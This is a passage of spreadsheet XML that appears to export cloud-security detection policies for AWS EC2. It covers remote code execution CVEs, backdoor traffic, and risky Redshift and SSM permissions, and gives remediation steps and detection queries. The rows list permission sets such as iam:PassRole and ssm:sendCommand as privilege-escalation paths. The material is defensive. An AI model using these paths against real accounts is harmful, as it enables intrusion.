      <c r="P1735" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1735" t="inlineStr"/>
      <c r="R1735" t="inlineStr"/>
      <c r="S1735" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1735" t="b">
        <v>0</v>
      </c>
      <c r="U1735" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1735" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1735" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2021-44832).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Log4j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Log4j (CVE-2021-44832) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X173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CVE-2021-44832
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-44832</t>
        </is>
      </c>
      <c r="Y1735" t="inlineStr"/>
      <c r="Z1735" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-44832'))</t>
        </is>
      </c>
      <c r="AA1735" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1735" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:14</t>
        </is>
      </c>
      <c r="AC1735" t="inlineStr"/>
      <c r="AD1735" t="b">
        <v>1</v>
      </c>
      <c r="AE1735" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1735" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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5" t="inlineStr">
        <is>
          <t>c8095d1f-95fa-4781-b1a2-071d27525a67</t>
        </is>
      </c>
      <c r="AI1735" t="inlineStr">
        <is>
          <t>724d25d9-d762-4887-ad07-50715a75420b</t>
        </is>
      </c>
      <c r="AJ1735" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1735" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1736">
      <c r="A1736" t="inlineStr"/>
      <c r="B1736" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1736" s="2" t="inlineStr"/>
      <c r="D1736" t="n">
        <v>2</v>
      </c>
      <c r="E1736" t="n">
        <v>0</v>
      </c>
      <c r="F1736" t="n">
        <v>0</v>
      </c>
      <c r="G1736" t="b">
        <v>1</v>
      </c>
      <c r="H17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736" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1736" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1736" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed AWS EC2 instance with regreSSHion vulnerability (OpenSSH, CVE-2024-6387)</t>
        </is>
      </c>
      <c r="L1736" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1736" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1736" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1736" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1736" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1736" t="inlineStr"/>
      <c r="R1736" t="inlineStr"/>
      <c r="S1736" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1736" t="b">
        <v>0</v>
      </c>
      <c r="U1736" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1736" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1736" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2024-6387).
regreSSHion (CVE-2024-6387) is an unauthenticated remote code execution flaw in OpenSSH's server (sshd) versions prior to  4.4p1 and OpenSSH versions between 8.5p1 and 9.8p1 (excluding) that permits attackers to obtain full root access. It impacts the default setup without requiring any user involvement, posing a significant security threat that could result in system breaches, data exfiltration, and the escalation of privileges for additional attacks. The fact that the AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the OpenSSH Remote code execution vulnerability on the publicly exposed AWS EC2 instance would allow an attacker to execute arbitrary code with the highest privileges, leading to a complete system takeover, malware installation, data manipulation and further move laterally to compromise other resources. This could lead to monetary loss, damage to reputation, and other compliance risks to the organization.
Immediate attention is required to remediate the OpenSSH (CVE-2024-6387) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X173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and remove CIDR range 0.0.0.0/0 for the Admin ports 22/3389
8. Click 'Save rules' to apply the changes
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-6387
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to the below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-6387</t>
        </is>
      </c>
      <c r="Y1736" t="inlineStr"/>
      <c r="Z1736" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on Admin ports') AND with : (Vuln WHERE id IN ('CVE-2024-6387'))</t>
        </is>
      </c>
      <c r="AA1736" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1736" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:47</t>
        </is>
      </c>
      <c r="AC1736" t="inlineStr"/>
      <c r="AD1736" t="b">
        <v>1</v>
      </c>
      <c r="AE1736" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1736" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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36" t="inlineStr">
        <is>
          <t>d255699e-8f0f-4572-a26c-fd72f3cb902c</t>
        </is>
      </c>
      <c r="AI1736" t="inlineStr">
        <is>
          <t>42f22ebd-ded3-4b66-ab16-bdd068d1e882</t>
        </is>
      </c>
      <c r="AJ1736" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1736" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1737">
      <c r="A1737" t="inlineStr"/>
      <c r="B1737" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1737" s="2" t="inlineStr"/>
      <c r="D1737" t="inlineStr"/>
      <c r="E1737" t="inlineStr"/>
      <c r="F1737" t="inlineStr"/>
      <c r="G1737" t="b">
        <v>1</v>
      </c>
      <c r="H17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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1737" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1737" t="inlineStr">
        <is>
          <t>Potentially nefarious backdoor activity detected on a publicly exposed and vulnerable AWS EC2 instance</t>
        </is>
      </c>
      <c r="L1737" t="inlineStr">
        <is>
          <t>MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1737" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1737" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1737" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1737" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1737" t="inlineStr"/>
      <c r="R1737" t="inlineStr"/>
      <c r="S1737" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1737" t="b">
        <v>0</v>
      </c>
      <c r="U1737" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1737" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1737" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed, have critical or high vulnerabilities and are connected to remote systems known for backdoor activities.
A backdoor allows unauthorized remote access to the instances where the malware is installed while bypassing the authentication mechanisms in place. If network connectivity with remote systems known for backdoor activity is observed on a publicly exposed and exploitable EC2 instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate backdoor activity, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X173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37" t="inlineStr"/>
      <c r="Z1737" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('Traffic from a suspicious IP address associated with Backdoor activity' or 'Traffic to a suspicious IP address associated with Backdoor activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1737" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1737" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1737" t="inlineStr"/>
      <c r="AD1737" t="b">
        <v>1</v>
      </c>
      <c r="AE1737" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1737" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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7" t="inlineStr">
        <is>
          <t>f47d6542-96e3-40a5-9533-aa415e83117b</t>
        </is>
      </c>
      <c r="AI1737" t="inlineStr">
        <is>
          <t>eca7e863-eecd-43d1-afc5-f37c3112799c</t>
        </is>
      </c>
      <c r="AJ1737" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1737" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1738">
      <c r="A1738" t="inlineStr"/>
      <c r="B1738" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1738" s="2" t="inlineStr"/>
      <c r="D1738" t="inlineStr"/>
      <c r="E1738" t="inlineStr"/>
      <c r="F1738" t="inlineStr"/>
      <c r="G1738" t="b">
        <v>1</v>
      </c>
      <c r="H17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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1738" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1738" t="inlineStr">
        <is>
          <t>Authentication bypass exploitation attempt on AWS EC2 with known exploitable vulnerability (CVE-2023-22515, Confluence)</t>
        </is>
      </c>
      <c r="L1738" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1738" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1738" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1738" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1738" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1738" t="inlineStr"/>
      <c r="R1738" t="inlineStr"/>
      <c r="S1738" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1738" t="b">
        <v>0</v>
      </c>
      <c r="U1738" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1738" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1738" t="inlineStr">
        <is>
          <t>This policy identifies attempts to exploit the Confluence authentication bypass vulnerability (CVE-2023-22515) in applications running on AWS EC2 resources, By detecting exploit attempts against CVE-2023-22515, this policy emphasizes critical attention to prevent unauthorized data access and breaches.
The vulnerability enables attackers to bypass authentication controls, posing a significant risk of unauthorized access to sensitive information. The successful exploitation of this vulnerability can lead to severe data privacy and integrity issues.
The detection of exploitation attempts, alongside identifying the presence of the vulnerability, highlights the importance of monitoring and rapid response to secure the affected applications. Prompt remediation efforts, including applying relevant patches are essential to mitigate risks associated with CVE-2023-22515.
Immediate remediation of the CVE-2023-22515 vulnerability on affected AWS EC2 instances is crucial.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1738" t="inlineStr">
        <is>
          <t>[Vulnerability]
1. Identify and access the reported resource affected by CVE-2023-22515
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
https://nvd.nist.gov/vuln/detail/CVE-2023-22515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1738" t="inlineStr"/>
      <c r="Z1738" t="inlineStr">
        <is>
          <t>asset WHERE asset.type = 'aws-ec2-describe-instances' and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2023-22515 - Confluence authentication bypass ) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2023-22515'))</t>
        </is>
      </c>
      <c r="AA1738" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1738" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:29</t>
        </is>
      </c>
      <c r="AC1738" t="inlineStr"/>
      <c r="AD1738" t="b">
        <v>1</v>
      </c>
      <c r="AE1738" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1738" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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8" t="inlineStr">
        <is>
          <t>296ed991-3a60-4009-b135-0b0dbe08ad75</t>
        </is>
      </c>
      <c r="AI1738" t="inlineStr">
        <is>
          <t>d7e5f78d-e11f-43da-88d7-365d57da0b3d</t>
        </is>
      </c>
      <c r="AJ1738" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1738" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1739">
      <c r="A1739" t="inlineStr"/>
      <c r="B1739" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1739" s="2" t="inlineStr"/>
      <c r="D1739" t="inlineStr"/>
      <c r="E1739" t="inlineStr"/>
      <c r="F1739" t="inlineStr"/>
      <c r="G1739" t="b">
        <v>1</v>
      </c>
      <c r="H17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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1739" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1739" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26858, CVE-2021-27065]</t>
        </is>
      </c>
      <c r="L1739" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1739" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1739" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1739" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1739" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1739" t="inlineStr"/>
      <c r="R1739" t="inlineStr"/>
      <c r="S1739" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1739" t="b">
        <v>0</v>
      </c>
      <c r="U1739" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1739" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1739" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to Remote Code Execution (RCE) with exploits in the wild [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26858, CVE-2021-27065].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version exposed makes it an easy target for an attacker to exploit these vulnerabilities.
Immediate attention is required to remediate the ProxyLogon/HAFNIUM Attack Chain vulnerabilities [CVE-2021-26858, CVE-2021-27065] reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X173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CVE-2021-26858
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-26858
   https://nvd.nist.gov/vuln/detail/CVE-2021-27065</t>
        </is>
      </c>
      <c r="Y1739" t="inlineStr"/>
      <c r="Z1739" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-26858, CVE-2021-27065 - ProxyLogon/HAFNIUM RCE Attack Chain) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-26858', 'CVE-2021-27065'))</t>
        </is>
      </c>
      <c r="AA1739" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1739" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:34</t>
        </is>
      </c>
      <c r="AC1739" t="inlineStr"/>
      <c r="AD1739" t="b">
        <v>1</v>
      </c>
      <c r="AE1739" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1739" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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39" t="inlineStr">
        <is>
          <t>0857351f-9808-4334-9678-cad7291771be</t>
        </is>
      </c>
      <c r="AI1739" t="inlineStr">
        <is>
          <t>a2e0bb5f-d1d1-4ef5-b965-ef1217dabc25</t>
        </is>
      </c>
      <c r="AJ1739" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1739" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1740">
      <c r="A1740" t="inlineStr"/>
      <c r="B1740" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1740" s="2" t="inlineStr"/>
      <c r="D1740" t="inlineStr"/>
      <c r="E1740" t="inlineStr"/>
      <c r="F1740" t="inlineStr"/>
      <c r="G1740" t="b">
        <v>1</v>
      </c>
      <c r="H17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40" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1740" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1740" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable AWS EC2 instance with Redshift Cluster creation permissions</t>
        </is>
      </c>
      <c r="L1740" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE,DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M1740" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1740" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1740" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1740" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1740" t="inlineStr"/>
      <c r="R1740" t="inlineStr"/>
      <c r="S1740" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1740" t="b">
        <v>0</v>
      </c>
      <c r="U1740" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1740" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1740" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed and vulnerable AWS EC2 instances with Redshift Cluster creation permissions that could potentially lead to privilege escalation.
Publicly exposed, vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to gain initial access to the instance. The risky privilege of Redshift Cluster creation on the instance further helps attackers escalate their privileges and perform unauthorised actions in the cloud account.
This policy checks for the following Redshift Cluster creation permissions:
'redshift:CreateCluster', 'iam:PassRole'.
Immediate attention is required to review risky permissions and grant only the least privileges required. Remove unwanted permissions assigned to the EC2 instances. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1740"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[PERMISSION]
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the resource-based policy of the resource
4. Remove the risky actions according to the alert details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1740" t="inlineStr"/>
      <c r="Z1740" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS Lateral Movement to Data Services Through Redshift Cluster Creation') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1740" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1740" t="inlineStr">
        <is>
          <t>2024-08-19 06:33:21</t>
        </is>
      </c>
      <c r="AC1740" t="inlineStr"/>
      <c r="AD1740" t="b">
        <v>1</v>
      </c>
      <c r="AE1740" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1740" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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40" t="inlineStr">
        <is>
          <t>43599049-edb5-46e1-b7a8-fd04d709aaf5</t>
        </is>
      </c>
      <c r="AI1740" t="inlineStr">
        <is>
          <t>416a05b9-9d27-42dc-b958-ae7ef67943e6</t>
        </is>
      </c>
      <c r="AJ1740" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1740" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1741">
      <c r="A1741" t="inlineStr"/>
      <c r="B1741" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1741" s="2" t="inlineStr"/>
      <c r="D1741" t="inlineStr"/>
      <c r="E1741" t="inlineStr"/>
      <c r="F1741" t="inlineStr"/>
      <c r="G1741" t="b">
        <v>1</v>
      </c>
      <c r="H17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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1741" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1741" t="inlineStr">
        <is>
          <t>HTTP request smuggling risk due to publicly exposed and vulnerable AWS EC2 instance [HAProxy, CVE-2023-25725]</t>
        </is>
      </c>
      <c r="L1741" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1741" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1741" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1741" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1741" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1741" t="inlineStr"/>
      <c r="R1741" t="inlineStr"/>
      <c r="S1741" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1741" t="b">
        <v>0</v>
      </c>
      <c r="U1741" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1741" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1741" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable HTTP request smuggling vulnerability [CVE-2023-25725].
HTTP request smuggling vulnerability can be leveraged by attackers to manipulate or bypass security mechanisms, potentially leading to unauthorized access, data leakage, or other security breaches. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the HAProxy [CVE-2023-25725] vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X174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CVE-2023-25725
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-25725</t>
        </is>
      </c>
      <c r="Y1741" t="inlineStr"/>
      <c r="Z1741" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-25725'))</t>
        </is>
      </c>
      <c r="AA1741" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1741" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1741" t="inlineStr"/>
      <c r="AD1741" t="b">
        <v>1</v>
      </c>
      <c r="AE1741" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1741" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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1" t="inlineStr">
        <is>
          <t>310f0aa2-3415-4259-b599-e1ab72f44210</t>
        </is>
      </c>
      <c r="AI1741" t="inlineStr">
        <is>
          <t>9604db52-0706-401a-9a56-ac84106dfd14</t>
        </is>
      </c>
      <c r="AJ1741" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1741" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1742">
      <c r="A1742" t="inlineStr"/>
      <c r="B1742" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1742" s="2" t="inlineStr"/>
      <c r="D1742" t="n">
        <v>6</v>
      </c>
      <c r="E1742" t="n">
        <v>0</v>
      </c>
      <c r="F1742" t="n">
        <v>0</v>
      </c>
      <c r="G1742" t="b">
        <v>1</v>
      </c>
      <c r="H17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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1742" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1742" t="inlineStr">
        <is>
          <t>Privilege escalation or remote command execution risk due to a publicly exposed and vulnerable AWS EC2 instance with excessive SSM permissions</t>
        </is>
      </c>
      <c r="L1742" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1742" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1742" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1742" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1742" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1742" t="inlineStr"/>
      <c r="R1742" t="inlineStr"/>
      <c r="S1742" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1742" t="b">
        <v>0</v>
      </c>
      <c r="U1742" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1742" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1742" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and have risky SSM permissions that could potentially lead to privilege escalation.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky privilege escalation SSM permissions on the instance further help the attackers to escalate their privilege and perform unauthorized actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'ec2:DescribeInstances', 'ssm:StartSession', 'ssm:DescribeSessions', 'ssm:GetConnectionStatus', 'ssm:DescribeInstanceProperties', 'ssm:TerminateSession', 'ssm:ResumeSession', 'ssm:listCommands', 'ssm:listCommandInvocations', 'ssm:sendCommand'
Immediate attention is required to review risky permissions and grant only the least privileges required. Remove unwanted permissions assigned to the EC2 instances. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X174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42" t="inlineStr"/>
      <c r="Z1742" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('AWS IAM policy allows Privilege escalation via EC2 describe and SSM list and send command permissions' or 'AWS IAM policy allows Privilege escalation via EC2 describe and SSM session permissions')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1742" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1742" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1742" t="inlineStr"/>
      <c r="AD1742" t="b">
        <v>1</v>
      </c>
      <c r="AE1742" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1742" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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2" t="inlineStr">
        <is>
          <t>9a900b57-0349-4356-8070-dca89d3b1ec0</t>
        </is>
      </c>
      <c r="AI1742" t="inlineStr">
        <is>
          <t>dda812a1-be30-445d-b4dc-8dda689d8e90</t>
        </is>
      </c>
      <c r="AJ1742" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1742" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1743">
      <c r="A1743" t="inlineStr"/>
      <c r="B1743" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
